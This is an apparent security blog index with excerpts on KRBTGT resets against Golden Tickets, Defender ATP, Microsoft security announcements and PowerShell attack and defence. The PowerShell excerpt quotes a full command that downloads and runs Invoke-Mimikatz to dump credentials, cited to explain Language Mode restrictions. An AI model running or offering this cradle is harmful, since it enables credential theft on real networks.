KRBTGT Account Password Reset – Security risk or operational risk?

Thursday, February 15, 2018

Hi, KRBTGT is the Key Distribution Center Service Account object, which is responsible for the core service of Active Directory. Nowadays we are exposed to many cyber-attacks that include querying and manipulating the KRBTGT user. A particularly popular attack is the Golden Ticket. Once an attacker has gained access to the KRBTGT account password hash, the attacker can create Golden Tickets. It is important to understand that any existing Golden Tickets will no longer be valid for use after the KRBTGT password is changed twice in rapid succession. This makes existing tickets unusable and removes the attacker's ability to create valid Golden Tickets with the KRBTGT hash they obtained. KRBTGT Account...

Windows Security Center – Service Vulnerable on client

Wednesday, February 14, 2018

Hi, Microsoft has taken some steps against cyber-attacks in recent years. One of them was learning how to get detailed and complete information from the client to the cloud, with the ability to know what unusual actions were taking place on the client. Windows Defender Security Center became the solution that manages the Windows Defender ATP client. The client deployment and management capabilities are among the highest I've come across in all the distribution issues and the ability to disrupt that deployment. Signing the service with a certificate is the means Microsoft has chosen in order to prevent the user from interrupting or stopping...

PowerShell Offensive & Defensive View

Monday, February 12, 2018

Hi, as we know, PowerShell can be much more than a scripting platform when it comes to administrative rights. Running unsigned processes and scripts helps the attacker advance another step toward the objective. Mimikatz and other painful tools are detected by antivirus and antimalware products, but when they bypass them, we are exposed to one of the suspicious attacks in PowerShell today. Using an IEX cradle to get a new file is one of them. Simply upload the PS script and run the following: “IEX (New-Object Net.WebClient).DownloadString('https://192.168.1.1/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds” PowerShell can limit access to the above command by using Language Mode. FullLanguage - permits all language elements...

Announcing Windows Defender Advanced Threat Protection

Tuesday, March 1, 2016

Hey, today Microsoft announced the next step in our efforts to protect enterprise customers with a new service, Windows Defender Advanced Threat Protection. Windows Defender Advanced Threat Protection is powered by a combination of Windows behavioral sensors, cloud-based security analytics, threat intelligence, and by tapping into Microsoft’s intelligent security graph. This immense security graph provides big-data security analytics that look across aggregate behaviors to identify anomalies, informed by anonymous information from over 1 billion Windows devices, 2.5 trillion indexed URLs on the Web, 600 million reputation look-ups online, and over 1 million suspicious files detonated every day.

A complete solution for monitoring and protecting enterprise cloud apps

Sunday, February 28, 2016

Hey, Microsoft has a strong, ongoing commitment to help customers stay safe in a world with ever-increasing threats from cyber criminals. As Satya announced last year and our Chief Information Security Officer (CISO) reiterated today, Microsoft is making huge investments to help Microsoft's customers stay secure. Microsoft is excited to announce a new set of security solutions, Microsoft Cloud App Security and Azure AD Identity Protection, that together give you a complete solution for monitoring and protecting enterprise cloud apps.

Microsoft ATA Update 1.5 – new capabilities included

Sunday, December 20, 2015

Hey, check out the following link. These are some of the new capabilities included in Microsoft Advanced Threat Analytics Update 1.5: http://blogs.technet.com/b/ata/archive/2015/12/17/advanced-threat-analytics-update-1-5-is-here.aspx

Microsoft Advanced Threat Analytics coming next month

Wednesday, July 22, 2015

Hey, Microsoft is nearing the finish line. Microsoft Advanced Threat Analytics will be generally available in August 2015: http://blogs.technet.com/b/ad/archive/2015/07/22/microsoft-advanced-threat-analytics-coming-next-month.aspx

An Inside Look at Cloud Service Provider Security with Mark Russinovich

Thursday, June 25, 2015

Hey, a great session from last month's Microsoft Ignite 2015 by Mark Russinovich, explaining how security components in cloud services are managed. Mark discusses the shared responsibility from the IT and service provider perspectives. Microsoft also covers real customer examples of its work with customers to detect tenant breaches, correct issues and patch any security vulnerabilities: https://youtu.be/y8Z_0CEJEQY?list=PLXtHYVsvn_b-ChQPB_3vo0TJs_LffcOrJ&t=0

The Risk of Leaked Credentials and How Microsoft’s Cloud Helps Protect Your Organization

Tuesday, June 23, 2015

Hey, last week the Microsoft Identity and Security Services Division announced that another new security report feature is now in preview, one that helps protect Azure Active Directory Premium customers from the risk associated with leaked credentials. Read More: http://blogs.microsoft.com/cybertrust/2015/06/18/the-risk-of-leaked-credentials-and-how-microsofts-cloud-helps-protect-your-organization/